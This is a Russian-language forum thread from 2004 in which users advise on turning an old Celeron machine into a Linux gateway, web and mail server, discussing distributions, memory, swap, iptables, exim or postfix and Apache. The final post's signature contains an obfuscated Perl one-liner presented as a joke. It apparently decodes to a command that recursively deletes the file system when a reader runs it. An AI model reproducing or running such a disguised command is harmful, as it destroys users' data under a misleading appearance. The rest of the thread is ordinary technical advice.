| imho.ws |
![]() |
|
|
|
# 1 |
|
Member
![]() ![]() ![]() |
Задачка встала ... сделать правильно шлюз
Светит нормальная выделенка
![]() Надо делать шлюз + Web + Почта есть : машинка Celleron 466/96mb/3gb с двумя сетевыми комплекты Linux RH9 и Mandrake9.2 Вопросы: Потянет ли ЭТО в принципе (100-200 посетителей web снаружи и 20 чел локальных) Какую систему из этих двух ставить и почему? Есть запасной канал ADSL - не хоца терять на аварийный случай... Есть ли ньюансы? ну или хоть ссылками помогите ![]() с уважением..
|
|
# 2 |
|
Junior Member
![]() |
Если ты не имелл ввиду 100-200 посетителей в день, а не в минуту, то потянуть - потянет. Особенно если это запасной вариант. Но тормозить, возможно, будет. Особоенно если у тебя эти 20 человек будут одновременно качать.
Я лично ставил RH на подобные машинки. Нормально. Про Mandrake ничего не скажу - не пробовал.
|
|
# 3 |
|
Member
![]() ![]() ![]() |
А критерий "тормознутости" в данном случае - процессор , память или дисковая система?
Что для Линуха важнее (имея ввиду конкретный случай) ? или не мудрить с апгрейтом и собрать нечто посовременнее исходя из критерия безгиморойности ... (вложился в железо раз и не имеешь серьёзных проблем год-два)
|
|
# 5 |
|
Junior Member
![]() |
Vdm
Выбор между RH и Mandrake. Хотя я бы тоже советовал бы фрю - и пошустрее будет ;-) iliton Память по-любому. Но если своп сделать раза в два побольше чем оперативная память - справицца. Ну а процессор - в зависимости от того, что у тебя там крутицца. Например, РНР скрипты, MySQL и т.п. могут привести к печальному исходу. Я сам такое наблюдал ;-) Но опять же - смотря какие. А насчет апгрейда..... конечно лучше, если есть возможность ;-) Это уж ты сам решай, насколько это будет разумно. Я же не знаю, сколько тебе на железки выделяют ;-) Я вот уже даже пробовать перестал - не дают бабок на апгрейд - и все тут. Может, у тебя по-другому ;-)
|
|
# 6 |
|
Guest
|
iliton
Так в чем вопрос? =) Настрой шлюз + Web + Почта грамотно - и ничего тормозить не будет. Ясен перец, что и в Шапке, и в Мандраке вычистить половину пакетов придется =))) Глупый вопрос, в общем... ИМХО, конечно же... а шлюз можно хоть из 486-го сделать =) |
|
|
# 7 | |
|
Newbie
![]() |
Цитата:
под шлюз особых каких-то пакетов кроме iptables и не надо... squid может если только... под почту berkeley db+exim или постфикс под веб - апач+перл+пхп (если надо) PS: а RH и MDK не одна ли хрень? Реально? |
|
|
|
|
|
# 9 |
|
Member
![]() ![]() ![]() |
зреет вопрос!
вот вы говорите вычистить пакеты... я поставил шапку, при установке она спросила - что ставить.. я сказал - будет сервер, ставить апача, эс ку эль, фтп, майл и утилиток несколько выбрал в результате сформировался пакет весом 1.2 гига!! в принципе всё работает, только свопится сильно (на мой взгляд) я - человек в линуксе новый, применяю метод научного тыка и чтения хауту... ![]() из прочитанного понял - пакеты весьма взаимозависимы ... в момент загрузки пробегает длиииинный список.. чистить... это как? и зачем, если можно отключить? или отключить можно не всё...? да, после всех приключений с переустановками (я ставил разные дистрибутивы 4е раза) работать не хотело хоть убей.. пока не вынул исовый саундбластер ![]() появилась свежая мысль - а не ну его нафик? не купить ли какой нить хардварный файрвол? или это малодушие и надо рубиться с линуксом до победного ... напрягает то, что не всегда ТОЧНО понимаю к чему приведут те или иные мои действия, а в моей ситуации ошибка может стоить достаточно дорого ![]() с уважением
|
|
# 10 | |
|
Member
![]() ![]() ![]() |
Я бы порекомендовал установить SuSE. При установке есть возможность выбора - "минимальная система" ( что-то около 200 пакетов). Система устанавливаеться без X-сервера, что значительно её облегчает.
Цитата:
Потом с помощью YaST устанавливаешь Apache, MySQL, Firewall, Почту и т.д., а с помощью MC эдитируешь конфиги .. и радуешься как шустро у тебя всё работает. PS: Могу помочь конфигом или советом. http://gennadi.dyn.ee
Я - root, мне всё разрешено... ... и это тоже echo "I am king" | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' & Последний раз редактировалось Gennadi; 11.01.2004 в 12:48. |
|
|
|